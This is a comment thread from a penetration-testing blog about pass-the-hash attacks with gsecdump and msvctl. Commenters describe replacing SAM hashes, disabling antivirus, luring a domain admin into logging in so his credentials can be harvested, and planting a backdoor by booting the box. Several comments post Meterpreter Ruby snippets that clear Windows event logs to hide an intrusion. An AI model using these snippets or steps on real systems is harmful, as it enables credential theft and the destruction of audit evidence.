Comments on Carnal0wnage Blog: passing the hash with gsecdump and msvctl (yes more)
Last updated 2024-01-24 04:15 -05:00, 11 comments.

CG (2010-03-19 13:29 -04:00):

> @CG: Not quite. For one, waiting for someone to log in, you'll get a LOCAL user, not necessarily a domain admin.

True, but all users startup catches everyone, and there are ways to get an admin to log in.

> Second, he'll surely notice this is **not** an XP machine.

umm, reboot the box back into windows after you drop the backdoor.

> This attack aims to get the domain admin credentials, which is as big a game as you'll get.

Agree, but I'll take user access over nothing any day.

Unknown (2010-03-19 10:13 -04:00):

@CG: Not quite. For one, waiting for someone to log in, you'll get a LOCAL user, not necessarily a domain admin. Second, he'll surely notice this is **not** an XP machine. This attack aims to get the domain admin credentials, which is as big a game as you'll get.

CG (2010-03-19 09:53 -04:00):

or if you have physical access to the box just boot to a linux distro and just stick your backdoor on the box and wait for someone to log in....

no reason to do a bunch of crazy shit if you already have access.

Unknown (2010-03-19 08:13 -04:00):

Let me fill in some details and add some more questions on passing the hash:

1) The first issue is getting in as local admin. In my company the boot order was HD first, but this took 1 minute to bypass by removing the relevant jumper. Next, ophcrack will give you the local admin password, but it does cost some 999$ if this involves non-alphanumeric values. There are other tools to replace the local admin password with your own; basically, think of a password, run it through MD5 to produce a hash, then use a LiveCD to replace the relevant SAM hash with your own.
So, the first step is the easy one.

2) Next, you need gsecdump. Well, any antivirus I know kills it as soon as it is seen by Windows. So what do you do? You write it on read-only media like a CD. Still, I get an 'access denied' message from the AV. So you need to kill AV. Two ways I can think of: erase the relevant folder via a LiveCD, or boot in SafeMode and erase the relevant executables in that folder. I was unable to disable AV otherwise. Next, you need to trick a domain admin into doing a remote access, perhaps asking for help with your printer or something. Assuming this access does take place and the domain admin does not reboot the machine, but logs off, then under Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Security Options -> Interactive Logon: Number of previous logons to cache (in case domain controller....) you see that the system keeps the last N logons. If N=1, then only the last credentials are kept, i.e. your own, when you log on after the domain admin has logged off.

So this attack is not that simple and it looks like it can be prevented with the right configuration, unless I miss something.

Anonymous (2009-04-21 21:10 -04:00):

> you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell.

If you are on the network you can run the tool on your own windows box, so *your* machine impersonates the hashes you copied off the other machine. This means there is no requirement for RDP etc.

Anonymous Steve!

Anonymous (2008-11-04 18:14 -05:00):

http://www.carnal0wnage.com/research/clearalllog.rb

Anonymous (2008-11-04 15:26 -05:00):

Very good! And I added this:

    print_line("Clearing the Security Event Log, it will leave a 517 event!")
    log = client.sys.eventlog.open('security')
    log.clear
    log.close

    print_line("Clearing the Application Event Log!")
    log = client.sys.eventlog.open('application')
    log.clear
    log.close

    print_line("Clearing the System Event Log!")
    log = client.sys.eventlog.open('system')
    log.clear
    log.close

CG (2008-11-04 06:32 -05:00):

that works just fine on XP/2003, I haven't tested it on Vista or Server 2008.

it will leave a 517 though. I had done some research and didn't see a way with the current API to pick specific logs and delete, you'd have to upload a third party tool to do that.

Anonymous (2008-11-04 05:14 -05:00):

I see this on ChiCon07_Gates_Metasploit-Day2-FunStuff.pdf, I don't know if it works fine:

clearseclog.rb

    print_line("Clearing the Security Event Log, it will leave a 517 event\n")
    log = client.sys.eventlog.open('security')
    log.clear

Anonymous (2008-11-04 04:45 -05:00):

OT: which is the simplest way to use meterpreter to clear logs on a windows system? Thank you very much

mubix (2008-09-13 15:24 -04:00):

CG you should check out http://hak5.org/forums/index.php?showtopic=9742&view=findpost&p=100051

Someone found some code that lets you access files through the windows permission structure (getting the same without admin). I haven't tested this code out, so use with caution.